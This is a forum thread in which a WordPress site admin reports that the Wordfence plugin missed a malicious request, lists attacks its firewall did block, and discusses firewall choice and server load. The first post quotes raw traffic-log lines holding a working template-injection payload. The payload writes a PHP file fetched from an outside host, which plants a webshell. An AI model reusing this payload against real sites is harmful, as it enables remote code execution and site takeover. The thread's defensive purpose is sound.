Wordfence Plugin fo...
 
Notifications
Clear all

Wordfence Plugin for Wordpress: Hit-And-Miss

6 Posts
2 Users
0 Reactions
99 Views
Editor
(@editor)
Posts: 553
Honorable Member Admin
Topic starter
 

NOT BLOCKED - MISSED.

The urls don't exist, still this should have been blocked, since it is clearly a SQL/XSS injection attempt.

Our Imunify360 server-wide protection also missed that, i alrealy know their reply from a previous incident: "why block a 404 url".

Ninja Firewall would have blocked that.

Recent Activity
Time: 1 hour 9 minutes ago -- Tue, 19 Dec 23 13:47:20 +0000 -- 1702993640.482122 in Unixtime
Seconds since last hit: 0.6399
URL: https: // removed /?tagstpl=about.html&tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&t=file_put_contents&t1=static/8.php&t2=file_get_contents&t3=http: // www . goodway . com . hk/d.txt (opens in new tab)
Type: Page not found
Full Browser ID: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Location: China

Time: 1 hour 9 minutes ago -- Tue, 19 Dec 23 13:47:19 +0000 -- 1702993639.842247 in Unixtime
URL: https: // removed /?tag&tagstpl=about.html&tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&t=file_put_contents&t1=static/8.php&t2=file_get_contents&t3=http: // www . goodway . com . hk/d.txt (opens in new tab)
Type: Normal request
Full Browser ID: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Location: China

 

 
Posted : December 19, 2023 17:00
Topic Tags
Editor
(@editor)
Posts: 553
Honorable Member Admin
Topic starter
 

On the other hand, those have been blocked by THEIR firewall rules (their network rules):

Netherlands was blocked by firewall for WooCommerce Payments <= 5.6.1 Authentication Bypass and Privilege Escalation

IP: 45.154.98.137 Hostname: 45.154.98.137.powered.by.rdp.sh

and

Ukraine was blocked by firewall for N-Media Post Front-end Form < 1.1 - Arbitrary File Upload

IP: 194.38.22.71 Hostname: nbl216.ntup.net

Still, i don't use WooCommerce or any related plugin or that N-Media Post Front-end Form plugin.

So the blocks are more "precautionary" measures in this case, BUT in my first post .... the SQL/XSS (also 404) were not blocked as preventive measures.

 
Posted : December 19, 2023 20:49
Maximus
(@maximus)
Posts: 57
Reputable Member
 

I was under the impression that you used Ninja Firewall and not Wordfence :)

 
Posted : December 22, 2023 13:20
Editor
(@editor)
Posts: 553
Honorable Member Admin
Topic starter
 

@maximus We were running Ninja Firewall for severals years, after the fiasko using The Shield plugin and get hacked.

Ninja Firewall is an excellent and extremely FAST firewall, but it is missing some features we needed here. Like the ability to block a range of IPs, User Agents, Hostnames etc. Rate Limiting also is a great feature and along with the Live Traffic monitor, makes Wordfence a great choice for us.

The only thing i have disabled is Wordfence Scan, since it seems to create all kind of problems and issues. Also Wordfence is not a lightweight plugin by any means.

 
Posted : December 22, 2023 15:38
Maximus
(@maximus)
Posts: 57
Reputable Member
 

Isn't that plugin heavy heavy for the DB and the CPUs?

 
Posted : December 22, 2023 21:52
Editor
(@editor)
Posts: 553
Honorable Member Admin
Topic starter
 

Posted by: @maximus

Isn't that plugin heavy heavy for the DB and the CPUs?

The Scan was heavy on the server, but i haven't noticed anything after i disabled it. Just a 5%-8% on the overall system loading BUT i have several custom blocks (user agents and hostnames) on Wordfence (around 80). Also when we rate limit, we auto BLOCK the IP for a week and those IPs add-up until cleared. So some DB usage going on all the time.

 

 
Posted : December 22, 2023 22:01